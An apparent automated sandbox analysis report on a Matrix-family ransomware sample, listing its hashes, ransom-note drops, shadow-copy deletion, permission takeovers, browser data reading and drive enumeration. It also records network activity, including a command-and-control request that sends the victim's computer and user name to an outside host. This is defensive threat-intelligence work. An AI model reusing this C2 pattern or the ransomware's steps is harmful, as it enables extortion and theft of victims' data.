matrix | 016061f330faaeffdd84628f613a719a2f617c8145909d047b5721429ee5b451

Analysis

max time kernel
161s
max time network
133s
platform
windows7_x64
resource
win7-en-20211208
submitted
01-02-2022 08:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Size

1.2MB
MD5

c82d64850d35cc6a536c11adbd261cf6
SHA1

9f4d070a1b4668d110b57c167c4527fa2752c1fe
SHA256

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
SHA512

777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002

Score

10^/10

matrix discovery persistence ransomware spyware stealer suricata upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	flow	ioc	Process
File created		C:\Program Files\VideoLAN\VLC\lua\http\css\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Mozilla Firefox\fonts\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files (x86)\Adobe\Reader 9.0\Resource\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Java\jre7\lib\zi\Etc\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Users\Admin\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Users\Admin\AppData\Roaming\Microsoft\Protect\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Microsoft Games\Purble Place\en-US\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Microsoft Games\SpiderSolitaire\en-US\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Users\Admin\AppData\Local\Microsoft\Feeds\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Mozilla Firefox\browser\features\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Microsoft Games\More Games\de-DE\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Google\Chrome\Application\89.0.4389.114\Extensions\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Microsoft Games\Multiplayer\Checkers\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Microsoft Games\Multiplayer\Checkers\es-ES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Java\jre7\lib\ext\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Microsoft Games\Multiplayer\Spades\de-DE\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files (x86)\Google\Update\1.3.36.71\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Microsoft Games\Chess\es-ES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Microsoft Games\More Games\es-ES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Java\jdk1.7.0_80\db\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
HTTP URL	3	http://fredstat.000webhostapp.com/addrecord.php?apikey=kok8_api_key&compuser=VQVVOAJK\|Admin&sid=udFY1pS4qIVw9T8F&phase=START	Process not Found
File created		C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Microsoft Games\Minesweeper\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Users\Public\Downloads\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Java\jre7\lib\zi\SystemV\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Java\jre7\lib\jfr\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n0kj3f68.default-release\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Microsoft Games\Solitaire\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Mozilla Firefox\browser\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\Google\Chrome\Application\Dictionaries\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Users\Public\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n0kj3f68.default-release\storage\permanent\chrome\idb\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created		C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n0kj3f68.default-release\OfflineCache\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Blocklisted process makes network request 1 IoCs

flow	pid	Process
9	1948	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	8Pk9qSFt64.exe

Executes dropped EXE 64 IoCs

pid	Process
760	NWbpVd9W.exe
1424	8Pk9qSFt.exe
1524	8Pk9qSFt64.exe
1608	8Pk9qSFt.exe
268	8Pk9qSFt.exe
1632	8Pk9qSFt.exe
1548	8Pk9qSFt.exe
1324	8Pk9qSFt.exe
1624	8Pk9qSFt.exe
1940	8Pk9qSFt.exe
1020	8Pk9qSFt.exe
796	8Pk9qSFt.exe
536	8Pk9qSFt.exe
1528	8Pk9qSFt.exe
108	8Pk9qSFt.exe
276	8Pk9qSFt.exe
1952	8Pk9qSFt.exe
1712	8Pk9qSFt.exe
1228	8Pk9qSFt.exe
1616	8Pk9qSFt.exe
316	8Pk9qSFt.exe
520	8Pk9qSFt.exe
1304	8Pk9qSFt.exe
1404	8Pk9qSFt.exe
860	8Pk9qSFt.exe
536	8Pk9qSFt.exe
552	8Pk9qSFt.exe
1728	8Pk9qSFt.exe
972	8Pk9qSFt.exe
740	8Pk9qSFt.exe
272	8Pk9qSFt.exe
1256	8Pk9qSFt.exe
1544	8Pk9qSFt.exe
1736	8Pk9qSFt.exe
2028	8Pk9qSFt.exe
1268	8Pk9qSFt.exe
1920	8Pk9qSFt.exe
1600	8Pk9qSFt.exe
1304	8Pk9qSFt.exe
992	8Pk9qSFt.exe
952	8Pk9qSFt.exe
664	8Pk9qSFt.exe
1276	8Pk9qSFt.exe
316	8Pk9qSFt.exe
1368	8Pk9qSFt.exe
108	8Pk9qSFt.exe
1948	8Pk9qSFt.exe
268	8Pk9qSFt.exe
992	8Pk9qSFt.exe
316	8Pk9qSFt.exe
1368	8Pk9qSFt.exe
1800	8Pk9qSFt.exe
1184	8Pk9qSFt.exe
1608	8Pk9qSFt.exe
1708	8Pk9qSFt.exe
800	8Pk9qSFt.exe
1856	8Pk9qSFt.exe
972	8Pk9qSFt.exe
1652	8Pk9qSFt.exe
1304	8Pk9qSFt.exe
1960	8Pk9qSFt.exe
1368	8Pk9qSFt.exe
536	8Pk9qSFt.exe
1652	8Pk9qSFt.exe

Modifies extensions of user files 3 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\MeasureDebug.tiff	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Pictures\StartUndo.tiff	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Pictures\SkipPing.tiff	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 54 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral11/files/0x00060000000130ff-68.dat	upx
behavioral11/files/0x00060000000130ff-69.dat	upx
behavioral11/files/0x00060000000130ff-70.dat	upx
behavioral11/files/0x00060000000130ff-74.dat	upx
behavioral11/files/0x00060000000130ff-75.dat	upx
behavioral11/files/0x00060000000130ff-77.dat	upx
behavioral11/files/0x00060000000130ff-78.dat	upx
behavioral11/files/0x00060000000130ff-80.dat	upx
behavioral11/files/0x00060000000130ff-81.dat	upx
behavioral11/files/0x00060000000130ff-83.dat	upx
behavioral11/files/0x00060000000130ff-84.dat	upx
behavioral11/files/0x00060000000130ff-86.dat	upx
behavioral11/files/0x00060000000130ff-87.dat	upx
behavioral11/files/0x00060000000130ff-90.dat	upx
behavioral11/files/0x00060000000130ff-89.dat	upx
behavioral11/files/0x00060000000130ff-92.dat	upx
behavioral11/files/0x00060000000130ff-93.dat	upx
behavioral11/files/0x00060000000130ff-95.dat	upx
behavioral11/files/0x00060000000130ff-96.dat	upx
behavioral11/files/0x00060000000130ff-98.dat	upx
behavioral11/files/0x00060000000130ff-99.dat	upx
behavioral11/files/0x00060000000130ff-101.dat	upx
behavioral11/files/0x00060000000130ff-102.dat	upx
behavioral11/files/0x00060000000130ff-104.dat	upx
behavioral11/files/0x00060000000130ff-105.dat	upx
behavioral11/files/0x00060000000130ff-107.dat	upx
behavioral11/files/0x00060000000130ff-108.dat	upx
behavioral11/files/0x00060000000130ff-110.dat	upx
behavioral11/files/0x00060000000130ff-111.dat	upx
behavioral11/files/0x00060000000130ff-113.dat	upx
behavioral11/files/0x00060000000130ff-114.dat	upx
behavioral11/files/0x00060000000130ff-116.dat	upx
behavioral11/files/0x00060000000130ff-117.dat	upx
behavioral11/files/0x00060000000130ff-119.dat	upx
behavioral11/files/0x00060000000130ff-120.dat	upx
behavioral11/files/0x00060000000130ff-122.dat	upx
behavioral11/files/0x00060000000130ff-123.dat	upx
behavioral11/files/0x00060000000130ff-125.dat	upx
behavioral11/files/0x00060000000130ff-126.dat	upx
behavioral11/files/0x00060000000130ff-128.dat	upx
behavioral11/files/0x00060000000130ff-129.dat	upx
behavioral11/files/0x00060000000130ff-131.dat	upx
behavioral11/files/0x00060000000130ff-132.dat	upx
behavioral11/files/0x00060000000130ff-133.dat	upx
behavioral11/files/0x00060000000130ff-134.dat	upx
behavioral11/files/0x00060000000130ff-137.dat	upx
behavioral11/files/0x00060000000130ff-136.dat	upx
behavioral11/files/0x00060000000130ff-139.dat	upx
behavioral11/files/0x00060000000130ff-140.dat	upx
behavioral11/files/0x00060000000130ff-142.dat	upx
behavioral11/files/0x00060000000130ff-143.dat	upx
behavioral11/files/0x00060000000130ff-146.dat	upx
behavioral11/files/0x00060000000130ff-147.dat	upx
behavioral11/files/0x00060000000130ff-149.dat	upx

Loads dropped DLL 64 IoCs

pid	Process
1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
1580	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
1996	cmd.exe
1424	8Pk9qSFt.exe
1304	cmd.exe
1392	cmd.exe
804	cmd.exe
536	cmd.exe
1368	cmd.exe
1588	cmd.exe
1392	cmd.exe
1708	cmd.exe
292	cmd.exe
860	cmd.exe
560	cmd.exe
1536	cmd.exe
1816	cmd.exe
1652	cmd.exe
1512	cmd.exe
292	cmd.exe
1976	cmd.exe
1368	cmd.exe
1960	cmd.exe
1816	cmd.exe
804	cmd.exe
1520	cmd.exe
2028	cmd.exe
1300	cmd.exe
1944	cmd.exe
108	cmd.exe
1876	cmd.exe
520	cmd.exe
1384	cmd.exe
1868	cmd.exe
1740	cmd.exe
1828	cmd.exe
560	cmd.exe
828	cmd.exe
1608	cmd.exe
1588	cmd.exe
1120	cmd.exe
1880	cmd.exe
1712	cmd.exe
1384	cmd.exe
876	cmd.exe
1740	cmd.exe
972	cmd.exe
560	cmd.exe
604	cmd.exe
1608	cmd.exe
1616	cmd.exe
292	cmd.exe
1676	cmd.exe
1740	cmd.exe
1120	cmd.exe
1688	cmd.exe
876	cmd.exe
1712	cmd.exe
1600	cmd.exe
1276	cmd.exe
1380	cmd.exe
1956	cmd.exe
876	cmd.exe
1688	cmd.exe

Modifies file permissions 1 TTPs 53 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1328	takeown.exe
1700	takeown.exe
1800	takeown.exe
800	takeown.exe
980	takeown.exe
552	takeown.exe
1000	takeown.exe
1380	takeown.exe
1296	takeown.exe
740	takeown.exe
1756	takeown.exe
1704	takeown.exe
268	takeown.exe
1320	takeown.exe
560	takeown.exe
1948	takeown.exe
1704	takeown.exe
1816	takeown.exe
1416	takeown.exe
1984	takeown.exe
1616	takeown.exe
1976	takeown.exe
1644	takeown.exe
1604	takeown.exe
1984	takeown.exe
1700	takeown.exe
1300	takeown.exe
1756	takeown.exe
1676	takeown.exe
1984	takeown.exe
964	takeown.exe
1600	takeown.exe
1944	takeown.exe
1948	takeown.exe
1544	takeown.exe
108	takeown.exe
520	takeown.exe
1512	takeown.exe
1700	takeown.exe
1072	takeown.exe
1776	takeown.exe
1800	takeown.exe
1616	takeown.exe
1756	takeown.exe
268	takeown.exe
1608	takeown.exe
1072	takeown.exe
948	takeown.exe
1876	takeown.exe
1268	takeown.exe
1276	takeown.exe
1276	takeown.exe
1528	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops desktop.ini file(s) 40 IoCs

description	ioc	Process
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\QDAZQ7UR\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\S3IV548V\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\NK9YD4KU\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\K819CMRP\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Z:	8Pk9qSFt64.exe
File opened (read-only)	\??\Z:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
